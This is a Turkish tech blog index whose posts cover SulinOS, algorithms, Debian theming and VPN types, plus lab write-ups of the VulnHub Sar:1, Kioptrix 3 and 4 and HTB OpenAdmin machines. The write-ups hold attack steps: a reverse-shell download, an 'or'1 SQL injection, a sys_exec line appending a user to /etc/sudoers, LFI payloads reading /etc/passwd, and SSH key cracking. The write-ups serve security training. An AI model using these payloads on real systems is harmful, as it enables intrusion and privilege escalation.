Navigasyonu değiştir
KernelBlog
Touch The Technology
İçeriğe geç
Anasayfa
Hakkımızda
Siber Güvenlik
Röportajlar
Diğer
Bilim
Yazılım
Araç Tanıtımı
Raspberry – Arduino
Linux
Windows
Mobil
Android
IOS
Projelerimiz
Siber Sözlük
Felis
YouTube
English
Teknoloji'ye Dair Her şey
Hakkımızda
Son Yazılarımız
Daha Fazlası İçin Takipte Kalınız.
SulinOS – Yerli ve Milli İşletim Sistemi
Temmuz 8, 2020
Linux
SulinOS bağımsız taban, systemd kullanmayan, genel amaçlı kullanım için tasarlanmış bir işletim sistemidir. Basit, az kaynak kullanımlı ve güvenli olmayı hedeflemektedir. SulinOS Özellikleri Kişisel bilgisayarlarda, sunucularda ve gömülü cihazlarda kullanılabilir. Kendi paket yöneticisi olan inary’i kullanır. Bunun dışında Archlinux’taki PKGCONFIG dosyalarından da paketler elde edebilir (deneysel bir özelliktir, henüz tamamlanmamıştır ve hatalar içerebilir) ve kullanabilirsiniz. Bütün paketler mümkün olduğunca yamasız derlenmektedir, bu da asıl kodlara bağlı kalındığını ve üzerinde fazla oynama yapılmadan sizlere saf bir GNU/Linux deneyimi yaşatacağını belirtir. SulinOS servis yöneticisi olarak OpenRC kullanmaktadır. Aynı zamanda bu sistemde force-elogind adında bir oluşum da bulunmaktadır, bu sayede systemd bağımlı paketleri systemd olmadan derleyip kullanabilirsiniz. SulinOS’ta SELinux’un yerini dolduran dummy-selinux yazılımına sahiptir. Paketler SELinux ve AppArmor desteği kapalı olarak derlenmektedir. sudo bu dağıtıma entegre edilmemiştir ve derlenmeyecektir. Root ile bir şey çalıştırmak istediğinizde ” su -c ‘komut’ ” şeklinde çalıştırmanız gerekir (ileride bunun basitleştirilmesi ve sudo’nun yerini alacak bir yazılım için çalışma yapılacaktır). Ayrıca bu dağıtım yukarıda anlatılanlardan görüldüğü üzere ne yaptığını bilen, gelişmiş kullanıcılar için tasarlanmıştır ve bağımsız taban olduğu için temasız gelmektedir. Bu dağıtım ücretsizdir ve sizi 3. parti paket yöneticileriyle paket kurmaya zorlamaz. İsteğe bağlı depoda bazı ek paket yöneticileri de bulunmaktadır: tekel – SulinOS geliştiricileri tarafından bazı paket eksikliklerini gidermek amacıyla hazırlandı, henüz biraz sorunlu olmasına rağmen birçok zaman ihtiyacınızı karşılayabiliyor. flatpak – Ekstra olarak depoya henüz koyulmamış veya koyulamayacak olan paketleri temin edebilmek amacıyla depoya eklendi. SulinOS web siteTelegram Görüntüler...
VulnHub Sar:1 WriteUp
Temmuz 5, 2020
Siber Güvenlik
Vulnhub’da karşıma çıkan sar:1 makinasının çözümü ile karşınızdayım. İlk olarak hedef makinemizin ip adresini bularak başlayalım. İp adresimizi bulduk şimdi sıra ip adresimize nmap taraması yapalım. Hangi portlar açık ve hangi servisler çalışıyor. Tarama çıktısı geldi gördüğünüz gibi 80 portumuz üzerinde default olarak http servisi çalışıyor versiyonu da “Apache httpd 2.4.29” olduğunu fark ettim . Hemen ip adresimizi tarayıcı üzerinden sitemize bakalım. Web sayfamızda bir sonuca varamadık hemen bir dizin taraması yapalım linkimize Karşımıza robots.txt çıktı hemen bakalım içinde ne varmış diye. Robots.txt dizinine gittiğimizde karşımıza sar2HTML yazısı çıkıyor.Hemen sar2HTML dizinine bakıyoruz tarayıcımızdan . Bu şekilde bir ekran çıktı karşımıza sol üstte “sar2HTML Ver 3.2.1” yazıyoruz hemen exploiti varmi bakalım. Exploit-db üzerinden exploitini bulduk Burada nasıl kullanacağımızı gösteriyor. Sitemize geri dönelim Şeklinde linkimizi düzenlediğimizde komut çalıştırabileceğimizi söylüyor deniyelim. Mademki burada komut çalıştırabiliyoruz o zaman reverse shell ile bağlantı kurabiliriz diye umuyorum deniyelim . Yukarıdaki komutumuz ile webshellimize ulaşıyoruz . Metin düzenliyicimiz sayesinde ip adresimizi düzenliyoruz. Local ağda işlem yaptığımız için local ip adresimi girdim ve bir port numarası verdik.Ardından python ile web sunucumuzu aktif hale getirmeliyizki hedef makine üzerinden dosyamızı indirme şansımız olsun. Web sunucumuz aktif şimdi hedef sistemimizin url kısmında get komutu ile hedef sisteme php dosyamızı indirmek için komutumuzu girelim. Gördüğünüz gibi ls komutu ile baktığımızda kernelblog.php dosyamızın hedef sistemde olduğunu görüyoruz.Hatırlarsanız php dosyamızda 3647 portunu yazmıştık şimdi sırada o portu dinlemek var . Portumuzu dinlemeye başladık şimdi sırada hedef makinada php dosyamızı çalıştırmak. Gördüğünüz gibi bağlantı sağladık . id komutu ile yetkimize bakalım .Verilen çıktıda “uid=33(www-data) gid=33(www-data) groups=33(www-data)” yetkisiz bir kullanıcı olduğumuz gördük şimdi sırada yetki yükseltme için çabalamakta CTF’lerde bu gibi yetkisiz kullanıcı olduğumuzu farkettiğizde kritik bir dosya veya crontab dosyayı varmıdır diye bakarız crontab dosyaları zamanlanmış dosyalardır etc dizinine girip crontab dosyası varmı diye ve o dosyaya üzerinde ne tür yetkimiz var diye bakıyoruz. Gördüğünüz gibi dosyayı okumaya yetkimiz var . Cat komutu ile dosyayı okuyalım . En alt satırda hepimizinde gördüğü gibi “var/www/html/ && sudo ./finally.sh” diye bir komut var en başında 5 dakikada bir belirttiği dizindeki finally dosyasını root yetkisiyle çalıştırdığı söylüyor .Şimdi gösterdiği dizine gidelim ve “ls -la ” ile dizindeki dosyalara bakalım Belirttiği dizine geldik ve finally.sh dosyasını okuyabildiğimizi gördük hemen cat ile dosyanın içine bakalım. finally.sh dosyamızı açtığımızda içinde write.sh dosyasını çalıştırdığını görüyoruz ve yukarıda “ls -la ” kodunu yazdığımızda write.sh dosyasına yazma iznimizin olduğunu gördük . finally.sh root yetkisi ile çalışıyor bu yüzden write.sh da root yetkisiyle açılır biz eğer write.sh ile shell çalıştırabilirsek yetki yükseltmiş oluruz.O yuzden shell dosyamızı bu dizinede indiriyoruz Komutumuz ile php dosyamızı dizine indirdik . Yeni dosyamızda port numarası olarak 555 ayarladık o yüzden 555 portunu dinlemeye alıyourz Şimdi write.sh dosyamıza php dosyamızı çalıştırması için gerekli komutu yazalım Cat komutu ile dosyamızın içine bakalım Şimdi 555 portumuzu dinliyorduk 5 dakikada bir çalışan kodumuzu bekliyelim . Gördüğünüz gibi artık sistemde root olduk şimdi flagi bulmalıyız. Gördüğünüz gibi root.txt içinde flagimize ulaştık Bir sonraki yazıda görüşmek üzere. Makineyi indirmek için : Sar 1 indir...
Algoritma Mantığı Ve Akış Diyagramları
Haziran 16, 2020
Diğer / Yazılım
Algoritma Nedir? Bilgisayara komut satırlarından oluşan kodlar bütünü yani program ile işlemler yaptırabilmek algoritma yardımıyla mümkündür. Algoritma, yapılması istenen bir işin aşamalarının ve bu aşamaların sırasının belirlenmesi ile oluşturulan yoldur. Algoritma tasarımının daha iyi anlaşılabilmesi için günlük hayatta da kullandığımız kek pişirme örneği verilebilir. Basit kek pişirme algoritması: BaşlaÇırpma kabı alUn alUnu çırpma kabına koyŞeker alŞekeri çırpma kabına koyYumurta alYumurtayı çırpma kabına koyYumurtayı kırÇırpıcı alÇırpıcı ile kaptakileri çırpKek pişirme kabı alÇırpma kabındakileri kek pişirme kabına dökKek pişirme kabını fırına verKek pişirme kabını fırından çıkarBitir Örneği verilen bu algoritma sonucu kek hazır hale gelir fakat algoritma detay içermediğinden kek, istenilen tam özelliklerde yemeye hazır olmayabilir. Kaç dk pişirileceği, çırpılacağı ve fırının kaç ℃ olması gerektiği gibi detayların da algoritmaya eklenmesi istenilen sonuca ulaşmaya yakınlaştırır. Algoritma mantığı değişmez, programlamada da aynı mantıkta kullanılır. Akış Diyagramları Programlama için yapılan algoritmanın daha kolay anlaşılabilmesi için akış diyagramı kullanılır. Akış diyagramında kullanılan şekillerin tanımları aşağıda açıklanmıştır. 1.Başla/Bitir Yapılacak olan işlemler bu iki şekil arasında yazılır. ‘Başla’ ile tasarıma başlanırken ‘Bitir’ ile tasarım sonlanır. 2.Veri Girişi Dışarıdan veri girişi yapıldığını belirten şekildir. Şekil içine birden fazla değişken ismi de yazılabilir. Şeklin içine ‘A’ yazılıp kullanıcının da programa ‘5’ girdiği düşünülürse bu işlem ‘A=5’ anlamındadır. 3.İşlem İşlem şeklinin içerisine hesaplanması istenilen ifadeler yazılır. Birden fazla işlem tek şekil içerisine virgül aracılığıyla yazılabilir 4.Karar Evet-hayır, doğru-yanlış gibi karar gerektiren karşılaştırma işlemlerinde kullanılır. İçinde yazılı olan şartın sonucuna göre işlemler gerçekleştirilir. 5.Döngü İşlem bloklarının içerisine yazılan değerin istenen koşul sağlanıncaya kadar tekrarlanmasını temsil eder. Döngü şeklinin içerisine başlangıç, bitiş ve adım değeri yazılır. 6.Çıktı Alfasayısal (cümle, kelime vs.) girdi yazdırılacak ise çift tırnak içerisinde (“Kernel” gibi), değişkenin içeriği yazdırılacak ise çift tırnak konulmadan değişken aynen yazılır. 7.Önceden Tanımlı İşlem Birçok küçük programın birleştirilmesiyle oluşan büyük programlarda önceden yapılmış işlemlerin kullanılmak istenen kısıma tekrar yazılması yerine parametreli veya parametresiz olarak işlemin çağırılarak kullanılmasını sağlar. Aynı kodların tekrar yazılmaması programın çalışmasında olumlu bir etkendir. x’in değeri ile ilgili önceden fonksiyon yazıldığı varsayılırsa tekrar kullanımı Şekil 7’deki gibi gösterilir. 8.Bağlantı İşlemleri birleştiren şekildir. Ayrı çizilen akış diyagramları arasında bağlantı kurma, sayfaya sığmayan akış diyagramını diğer sayfadakiyle birleştirme gibi farklı işlemlerde kullanılır. 9.İşlem Akış Yönleri Akışın hangi yönde olduğunu belirten oklardır....
Debian Özelleştirme – Tema ve İkon
Haziran 7, 2020
Linux
Merhabalar, bu yazımda hep duyduğunuz debian sistemini kendimize göre tema ve ikon özelleştirmelerinde bulunacağız. Debian Edinme Öncelikle debian sistemimizi web sitesinden indirelim. Ben debian 10.4.0 sürümünü indirdim ve gnome masaüstü ortamını kurdum. Linux kurulumu artık çok basit şimdilik bu kısmı atlıyorum, duruma göre videosu veya yazısı paylaşılır. Tema Seçme Varsayılan gnome temasını değiştirmek istiyoruz diyelim, bunun için yeni tema seçmemiz lazım. Mesela ben debian sistemim MacOs gibi olsun istiyorum görünümünü ona göre bir tema seçtim. Bu temaları gnome-look.org adresinden bulabilirsiniz. İkon Seçme MacOs teması seçtiğim için ikonları da ona göre seçmem mantıklı olur. Gnome look sitesinden arama yapıp, yüklemek istediğim ikonu seçiyorum. Kurulum Tema ve ikonlarımızı seçip indirdikten sonra kurulumlarımızı yapmaya başlayalım. Öncelikle Gnome Tweak Toolumuzu kuralım. Temamızı zipten çıkarıp /usr/share/themes dizinine taşıyalım. Şimdi ikonumuzu zipten çıkarıp /usr/share/icons dizinine taşıyalım. Son olarak sistem araçlarından İnce Ayarları açıp, görünüm sekmesinden temalar kısmını aşağıdaki görselde ki gibi yaptığınızda tema ve ikonlarınızı değiştirmiş olursunuz....
Sızma Testi Örnekleri:Kioptrix Level 4
Mayıs 22, 2020
Siber Güvenlik
Serinin devamında kioptrix‘in 4. makinesini inceleyeceğiz. Açıkçası öncekilerinden seviye olarak pek bir farkı yok bu arkadaşın fakat privesc açısından diğerlerinden biraz farklı 😉 Her zaman ki gibi işe makinenin ip adresini bulmayla başlayalım. Bunun için Netdiscover kullanıyorum. Nmap ile hem script taraması yapıp hem de hangi portlarda hangi servisler çalışıyor ona bakalım şimdi de. Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-10 12:19 AKDT Nmap scan report for 192.168.42.131 Host is up (0.00011s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) |_clamav-exec: ERROR: Script execution failed (use -d to debug) | vulners: | cpe:/a:openbsd:openssh:4.7p1: | CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478 | CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906 | CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708 | CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755 |_ CVE-2008-5161 2.6 https://vulners.com/cve/CVE-2008-5161 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) |_clamav-exec: ERROR: Script execution failed (use -d to debug) | http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.42.131 | Found the following possible CSRF vulnerabilities: | | Path: http://192.168.42.131:80/ | Form id: myusername | Form action: checklogin.php | | Path: http://192.168.42.131:80/checklogin.php | Form id: | Form action: index.php | | Path: http://192.168.42.131:80/index.php | Form id: myusername |_ Form action: checklogin.php |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: | /database.sql: Possible database backup | /icons/: Potentially interesting folder w/ directory listing | /images/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch' |_ /index/: Potentially interesting folder |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack Bu çıktı bize bilmemiz gereken herşeyi söylüyor aslında.Hemen webden ilerleyelim.Hedef makineye 80.porttan baktığımızda bizi şöyle bir sayfa karşılıyor. Nmap çıktısında gördüğünüz gibi database.sql dosyasının olduğunu söylüyor.Kesin birşeyler vardır deyip ona da bakıyorum. John isimli bir kullanıcının parolasının 1234 olduğunu görüyorum ama bu kadar kolay olmamalı değil mi ? Evet bu kadar kolay olsaydı şaşardım.Fakat nedense içimden bir ses sqli var diyor.Kullanıcı adını john parolayı ise ‘or’1 olarak girdiğimde giriş yapıyorum. Peki burda çıkan parola ne alaka ? Sevgili dostlar öğrendiğim bir şey varsa o da bulduğum bütün parolaları her yerde denemek.Bu yüzden öncelikle ssh denemesi yapıyorum.Beni Libgoat Shell karşılıyor.Görüldüğü üzere hiçbir komut işe yaramıyor. Help diyerek neler yapabildiğime baktığımda echo komutunu çalıştırabildiğimi görüyorum.Bu komut ile interaktif shell e geçebilirim; Pekala şimdi sıra geldi hak yükseltmeye. Öncelikli olarak suid bit ayarlı dosyalara bakalım işe yarar bir şey var mı ? İşe yarar birşeyler çıkmadı.Sudo komutu ile hangi programları çalıştırabileceğime de bakayım dedim ama kullanıcı sudoers dosyasında değilmiş. Hmm. Makinede dolaşırken /var/ww dizinine de bi bakayım dedim.Sonuçta site dosyaları var.robert dizini dikkatimi çekti. cat ile robert.php dosyasına baktığımda mysql bilgileri kabak gibi duruyordu önümde. İyi hoş belki mysql ile root olabiliriz ama önce ps komutu ile root yetkileriyle çalışıp çalışmadığına bakalım. Çok güzel şimdi işe koyulma vakti.mysql e girdikten sonra hangi fonksiyonları çalıştırabileceğimizi görelim şu komutçuk ile; select * from mysql.func; Ne görelim sys_exec fonksiyonunu çalıştırabiliriz.İsminden de anlayacağınız gibi bu abimiz komut çalıştırmamızı sağlıyor.Sudoers dosyasına adımızı altın harflerle yazarsak bu iş tamam demektir.(Mysql de hak yükseltmenin başka yolları da var tabiki örneğin lib_mysqludf_sys.so dosyası ile de yapabilirdik fakat madem sys_exec fonksiyonunu çalıştırabiliyoruz o zaman gereksiz uğaşa girmeyelim değil mi?) select sys_exec(‘echo “john ALL=(ALL) ALL” >> /etc/sudoers ‘); Başarıyla sudoers dosyasına yazdık.Şimdi root olma vakti. Görüldüğü üzere root olmayı başardık.Son olarak bir de /root/ dizini altında işi bitirdiğimizi söyleyen congrats.txt var ona da göz ucundan bakalım 🙂...
[HTB] OpenAdmin WriteUp (10.10.10.171)
Mayıs 11, 2020
Siber Güvenlik
Uzun zamandan sonra selamlar dostlar. Bu yazımda Hack The Box üzerinde bulunan OpenAdmin makinasının çözümüne değineceğim şimdiden iyi okumalar. Makinamızın ip adresi 10.10.10.171. Şimdi gelin bir nmap taraması yapalım ardından makinanın açık portlarına ve bu portların üzerinde çalışan servislere bir göz atalım. 80 ve 22 portları açık olarak gözüküyor. İkisinin de üzerinde çalışan servisler güncel yani bir exploit bulamayız gelin 80 portunda yani webserverda ne varmış bakalım. Apache’nin default web sayfası var. Ancak burada direk akla gelen bir şey var o da dizinleri dirb veya dirbuster ile taramak. Dirbuster’ı çalıştırdık ve /ona/ diye bir dizin bulduk. Bu dizine girelim ve içeride ne var bakalım. Evet ona dizininde çalışan bir yazılım var. Ancak gördüğünüz gibi versiyonu eski. Bundan faydalanabiliriz. İnternette bu versiyonun bir exploitini bulduk. Tam istediğimiz gibi uzaktan kod yürütmemizi sağlıyor. Bu exploit sayesinde içeriye sızabiliriz. Ancak ben bu exploiti sh olarak çalıştırmak istemiyorum bunu bir python scriptine dönüştüreceğim. O scripte de buradan ulaşabilirsiniz. Scriptimi çalıştırdım ardından “ls –la” komutumu yazdım ve sunucudaki dosyaları artık görebiliyorum. Gözüme direk config dosyaları çarpıyor. Biraz dizinleri gezeyim ve config dosyalarında neler varmış bakayım. config dizininin altındaki config.inc.php dosyasını okudum ve dosyanın içerisindeki bir kısım dikkatimi çekti. Bu satırda database_settings.inc.php adında bir dosya ve bu dosyanın hangi dizinde olduğunu görüyoruz. Şimdi gidip o dosyayı bulup okuyalım. Şöyle bir şifre bulduk. Şimdi hatırlarsanız 22 portu yani ssh portu açıktı. Bu bulduğumuz şifre herhangi bir kullanıcıya ait olabilir ve bu şifreyle o kullanıcıya ssh ile bağlanabiliriz. Sistemdeki kullanıcıları görmek için “cat /etc/passwd” komutunu çalıştırıyoruz. Sistemde root dışında iki adet kullanıcı var. Jimmy ve joanna kullanıcıları. Şimdi gelin ssh üzerinden bu kullanıcılara bulduğumuz şifre ile bağlanmayı deneyelim. Şifre Jimmy adlı kullanıcıya aitmiş artık içeride Jimmy kullanıcısı olarak işlem yapabiliriz. Ancak aklıma şöyle bir şey geldi. Az önce scriptte dizinleri gezerken /var/www/ dizininin altında farklı klasörler de vardı. Onları incelemeye karar verdim. /var/www/ dizininin altında html dizini dışında internal dizini de var. Ve içinde 3 adet dosya var. Şimdi bu dosyaların içini “cat” ile okuyorum. main.php dosyasının içinde benim tam da aradığım şey var. Bir kullanıcıya ssh ile bağlanmak için o kullanıcının private key’ine ve passphrase key’ine sahip olmam yeterli. Benim bu dosyaya “curl” ile istek atmam gerekiyor. Ama burada şöyle bir durum var şimdi ben tarayıcıya http://10.10.10.171 yazdığımda /var/www/html dizininin altındakileri gösteriyor ancak bu dosya /var/www/internal dizininin altında. Bu noktada bilgi toplamaya devam etmemiz gerekiyor. Bakmamız gereken yer apache’nin config dosyalarının bulunduğu dizin. Bu dizinde /etc/apache2/sites-available/internal.conf dosyası bulunuyor onu okuyalım. İnternal klasörüne erişimin yalnızca yerel olarak mümkün olduğunu görüyoruz. Yani yapmamız gereken işlem curl ile http://localhost:52846/main.php ye istek atmak. Evet isteğimi attım ve hop joanna kullanıcısının private keyi artık bende. Ancak direk sadece private key ile bağlanamam. Bu private keyi kendi bilgisayarımda Masaüsatünde joanna_rsa dosyası olarak kaydediyorum. Şimdi joanna_rsa adlı dosyayı ssh2john.py scriptiyle hash haline çevirmem gerekiyor. Ardından da çevirdiğim hash’i “John the Ripper” ile bruteforce kullanarak kırmam gerekiyor. Hemen bu iki işlemi de yapıyorum. Hash dosyamın içerisindeki şifrelemeyi rockyou.txt wordlistiyle kırdım. Ve sonuç olarak “bloodninjas” çıktısını aldım. İşte şimdi joanna kullanıcısına ssh ile bağlanabilirim. Hemen bağlantıyı gerçekleştirelim. Bir kullanıcıya private key ile bağlanırken –i ile private keyin bulunduğu dosyayı vermelisiniz. Ardından sizden passphrase key ister ve bizim kırarak bulduğumuz “bloodninjas” burada passphrase keyimiz. Joanna kullanıcısına ssh ile bağlantımızı tamamladık hatta hemen user flagi de okuduk. OpenAdmin Own User aşamasını bitirdik. Şimdi bizim bu makinada root olmamız gerekiyor ancak nasıl? Hemen cevabı vereyim. İlk denememiz gereken şey sudo –l komutu. Hemen deneyelim. “sudo –l” komutu bize “sudo” komutunu şifre istemeden nerelerde kullanabileceğimizi söyler. Burada gördüğümüz ise şu. Biz nano’yu /opt/priv dosyasını okumak için sudo ile çalıştırdığımızda bizden bir şifre istemeyeceğini söylüyor. Hemen deneyelim. Evet dosyamızı “sudo /bin/nano /opt/priv” komutumuzla açtık. Bu dosyanın içi boş ancak bunun bir önemi yok şu an nanoyu root olarak açmış olduk yani istediğimiz her dosyayı rahatlıkla okuyabiliriz. Yetkimiz var. Hemen “ctrl+r” tuş kombinasyonuyla farklı bir dosyayı nanodan çıkış yapmadan içeri aktarıyoruz. Bize lazım olan dosya /root/ dizininin altındaki root.txt dosyası ve dosyanın yolunu yazarak içeri aktarıyoruz. Ve root flag’i de artık elimizde. OpenAdmin Own Root aşamasını da bitirmiş olduk ve artık OpenAdmin makinasına komple sızma işlemi bitmiş oldu. Herkese iyi çalışmalar…...
VPN Nedir, Çeşitleri Nelerdir ?
Mayıs 8, 2020
Diğer
VPN Nedir ? Virtual Private Network olarak bilinen Türkçe karşılığı “Sana Özel Ağ” teriminin kısaltılmış olan VPN en basit anlatımda fiziksel olarak dahil olmadığımız bir konumdaki ağa bağlantı kurmamızı sağlarlar. VPN Nasıl Çalışır? Kendi cihazınız ile bağlantı kurmak istediğiniz ağ arasında farklı şifreleme sistemlerine sahip protokoller ile şifreli bir bağlantı kurulmasını sağlayarak kripto anlamında bir tünel açar ve tüm veri giriş ve çıkışını şifreler. 3. Kişiler veya internet servis sağlayıcınız tarafından takip edilemez .Birçok vpn türü var farklı protokoller hepsini yazımızın devamında tüm detayları aktaracağız. VPN Protokol Türleri VPN protokolleri temelde iki tanedir aslında konuya genelde baktığımızda bunlar ; IPSec SSL IPSec VPN Nedir ? Büyük firmalar ,kurumlar farklı lokasyondaki şubelerini network anlamında birbirlerine bağlayarak bir ileşim altyapısı oluşturmak için ilk başlarda Leased-Line adı verilen bi yöntem kullanılıyordu ancak bu oldukça maliyetliydi.Ardından firmalar lokasyonlarını birbirlerini bağlayabilmek için IPSec VPN geliştirildi.Nasıl çalışır ? Merkez lokasyonda bulunan firewall , gateway gibi cihaz ile diğer lokasyondaki cihaz arasında şifreli tünel oluşturur ancak kişisel cihaz veya mobil cihaz desteği yoktur. SSL VPN Nedir ? Bu karantina süreçlerindede firmaların özellikle kullanyama başladığı vpn protokollerinden biridir. Günlük hayatımızda son kullanıcılarında kullandığı normal vpn olarak bildiğimiz SSL VPN‘dir. Ne gibi artıları vardır ? Kullanım kolaylığı Uzaktan erişim kolaylığı Mobil cihaz desteği SSL VPN Türleri SSL VPN kendi içinde farklı protokollerden oluşmaktadır . Bunlar ; PPTP(Point to point tunnelling protocol) Windows için özel çıkartılmış olup bağlantı kurulması için kullanıcı adı ve şifre ile bağlantı kurabilirsiniz.En düşük şifreleme sistemi pptp’dir . Avantajları -Hızlıdır . -Kurulumu kolay. Dezavantajları -Tamamen güvenli değildir -NSA tarafından gizliliği ihlal edilmiştir. IKEv2 (Internet Key Exchange Version 2) Hepimizin duymuş olabileceği firmalardan olan Cisco ve Microsoft tarafından geliştirilmiştir . Anti-Dos özelliği vardır. Avantajları -Blackberry cihazlarını destekler. -Diğer protokollere göre daha hızlıdır. -Kurulumu kolay Dezavantajları -Sınırlı platorm desteği L2TP(Layer 2 Tunneling Protocol) İki farklı kaymanda çalışan bu protokol 2058 bit şifreleme yapabiliyor.Ancak bunun bir dejavantajı var şifreleme bu kadar güçlü olunca hızda da ciddi anlamda düşüyor. Avantajları -Kurulumu kolay. -Güvenli kabul edilir Dezavantajları -Kısıtlayıcı firewall ile kullanıldığından problem çıkarabilir -Yavaş SSTP(Secure Socket Tunneling Protocol) Microsoft tarafından geliştirilmiş .SSL/TLS şifreleme yöntemi kullanılır . Avantajları –Winows için tamamen entegredir-Microsof desteği vardır-Güvenik seviyesi şifrelemeye bağlıdır, genellikle güvenli sayılır Dezavantajları -Windows’a özgündür...
Sızma Testi Örnekleri:Kioptrix Level 3
Nisan 29, 2020
Siber Güvenlik
Kioptrix level 2 den birazcık daha zor ama oldukça zevkli ve düşündürücü oldu benim için. Birkaç yeni bilgi edindim bu makine sayesinde. Sizlerinde öğreneceğinizi tahmin ediyorum. Lafı uzatmadan başlayalım. Sızma Testi Örnekleri:Kioptrix level 1Sızma Testi Örnekleri:Kioptrix Level 2 Kioptrix Level 3 indirme bağlantısı : https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ İlk olarak netdiscover ile hedef makinenin ip adresini bulalım. Nmap ile makineyi detaylı tarama yaptığımızda aslında bilmemiz gereken çoğu şeyi gösteriyor bize Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-08 11:20 AKDT Nmap scan report for 192.168.42.55 Host is up (0.00039s latency). Not shown: 65533 closed ports PORT STATE SERVICE 22/tcp open ssh |_clamav-exec: ERROR: Script execution failed (use -d to debug) 80/tcp open http |_clamav-exec: ERROR: Script execution failed (use -d to debug) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set | http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.42.55 | Found the following possible CSRF vulnerabilities: | | Path: http://192.168.42.55:80/gallery/ | Form id: | Form action: login.php | | Path: http://192.168.42.55:80/index.php?system=Admin | Form id: contactform | Form action: index.php?system=Admin&page=loginSubmit | | Path: http://192.168.42.55:80/index.php?system=Blog&post=1281005380 | Form id: commentform | Form action: | | Path: http://192.168.42.55:80/gallery/index.php | Form id: | Form action: login.php | | Path: http://192.168.42.55:80/gallery/gadmin/ | Form id: username | Form action: index.php?task=signin | | Path: http://192.168.42.55:80/index.php?system=Admin&page=loginSubmit | Form id: contactform |_ Form action: index.php?system=Admin&page=loginSubmit |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: | /phpmyadmin/: phpMyAdmin | /cache/: Potentially interesting folder | /core/: Potentially interesting folder | /icons/: Potentially interesting folder w/ directory listing | /modules/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch' |_ /style/: Potentially interesting folder | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_ http://ha.ckers.org/slowloris/ | http-sql-injection: | Possible sqli for queries: | http://192.168.42.55:80/index.php?page=index%27%20OR%20sqlspider | http://192.168.42.55:80/index.php?page=index%27%20OR%20sqlspider | http://192.168.42.55:80/index.php?page=index%27%20OR%20sqlspider | http://192.168.42.55:80/index.php?page=index%27%20OR%20sqlspider | http://192.168.42.55:80/index.php?page=loginSubmit%27%20OR%20sqlspider&system=Admin | http://192.168.42.55:80/index.php?page=index%27%20OR%20sqlspider | http://192.168.42.55:80/index.php?page=index%27%20OR%20sqlspider | http://192.168.42.55:80/index.php?page=index%27%20OR%20sqlspider | http://192.168.42.55:80/index.php?page=index%27%20OR%20sqlspider | http://192.168.42.55:80/index.php?page=index%27%20OR%20sqlspider |_ http://192.168.42.55:80/index.php?page=loginSubmit%27%20OR%20sqlspider&system=Admin |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-trace: TRACE is enabled |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) MAC Address: 08:00:27:67:96:F9 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 323.17 seconds Kioptrix Level 3 WEB Webden ilerlemeden önce kioptrix makinesinin giriş ekranındaki bilgiyi ciddiye almakta fayda var. etc dizini altında bulunan hosts dosyasına gereken ayarı yapalım. Şimdi web üzerinden ilerleyebiliriz.Bizi şöyle bir web sayfası karşılıyor. Giriş sayfasındaki yazının en altında bulunan “now” bağlantısına tıklıyorum ve eğlenceli bir sayfa çıkıyor karşımıza. Size eğlenceli ve masum gelebilir ama sayfanın sol altında bulunan butonda sıralamayla oynadıktan sonra URL kısmında tehlikeyi hissedebilirsiniz 🙂 id kısmına ufak bir tırnak herşeyi mahvedebilir. Şimdi sqlmap ile kolay bir şekilde kritik bilgilere ulaşabiliriz. gallery veritabanına girelim ve tablolara göz atalım. Kullanıcı bilgilerinin burda olduğu aşikar.Dump edelim İhtiyacımız olan tam da buydu.Şimdi ssh ile devam edelim bakalım bilgiler işe yarayacakmı. Bulunduğum dizinde “CompanyPolicy.README” isimli bir dosya var.İçinde ht editörü sudo ile açmamı istediği yazıyordu. “sudo -l” komutu ile baktığımda şifresiz olarak ht editörü açabileceğimi gördüm.Bu bizim için çok iyi bir haber. Tabi ht editörü açmam için environment değerini değiştirmem gerekecek. ht editörü ile etc dizini altında bulunan sudoers dosyasını açıp ufak bir değişiklik ile root olabiliriz.Ht editörde dosya açmak için F3 tuşuna basın ve dosya yolunu girin. loneferret kullanıcısına şifresiz çalıştırabileceği yeni path olarak /bin/sh girersek root olabiliriz.(virgül koymayı unutmayın ) F2 ile kaydedip çıkalım. sudo -l komutu ile tekrar kontrol ettiğimde şifresiz olarak çalıştırabileceğimi görüyorum.Ve sonuç .. /root dizini altında bulunan Congrats.txt dosyasını okuyup bitirebiliz. Ama daha da ilerleyebiliriz bence. Web sayfasında gezinirken url kısmına gözüm çarptı ve lfi olabileceğinden şüphelendim.Haklıydımda./etc/passwd dosyasını okuyabildim. Ilgili zafiyet: http://vulnerable_host/preview.php?file=../../../../etc/passwd%00 http://vulnerable_host/preview.php?file=../../../../etc/passwd%00jpg Aynı zamanda anasayfada menüde bir de login vardı.Girdiğimde karşıma şöyle bir login ekranı çıktı ve bilin bakalım aşağı 